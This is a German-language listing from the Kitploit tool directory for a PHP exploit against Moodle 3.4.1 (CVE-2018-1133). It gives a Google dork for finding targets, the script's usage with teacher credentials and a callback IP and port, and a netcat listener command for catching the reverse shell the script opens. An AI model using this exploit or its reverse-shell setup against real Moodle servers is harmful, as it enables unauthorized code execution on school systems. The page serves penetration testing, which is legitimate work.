Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
MoodleExploit — Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133 | Kitploit
Tools/GitHubGitHub/darrynten/moodleexploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubdarrynten/moodleexploit

MoodleExploit

Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133

Repository anzeigen
105vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Moodle Exploit

  • Exploit-Titel: Moodle v3.4.1 RCE Exploit
  • Google Dork: inurl:"/course/jumpto.php?jump="
  • Datum: 15. März 2019
  • Exploit-Autor: Darryn Ten
  • Hersteller-Homepage: https://moodle.org
  • Software-Link: https://github.com/moodle/moodle/archive/v3.4.1.zip
  • Version: 3.4.1 (möglicherweise < 3.5.0 und vielleicht sogar 3.x)
  • Getestet auf: Linux mit Moodle v3.4.1
  • CVE: CVE-2018-1133

Ein Benutzer mit der Lehrerrolle kann beliebigen Code ausführen.

Verwendung

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

root@kitploit:~
user       The account username
pass       The password to the account
ip         Callback IP
port       Callback Port
course     Valid course ID belonging to the teacher

Stelle sicher, dass du einen Netcat-Listener auf dem angegebenen Port laufen lässt, bevor du dieses Skript ausführst.

nc -lnvp 1010

Dieses Skript versucht, eine Reverse-Shell zur angegebenen IP und zum angegebenen Port zu öffnen.

Hinweise

Dieser Exploit basiert auf Informationen von Robin Peraglie.

Weiterführende Lektüre: https://blog.ripstech.com/2018/moodle-remote-code-execution

Tool herunterladen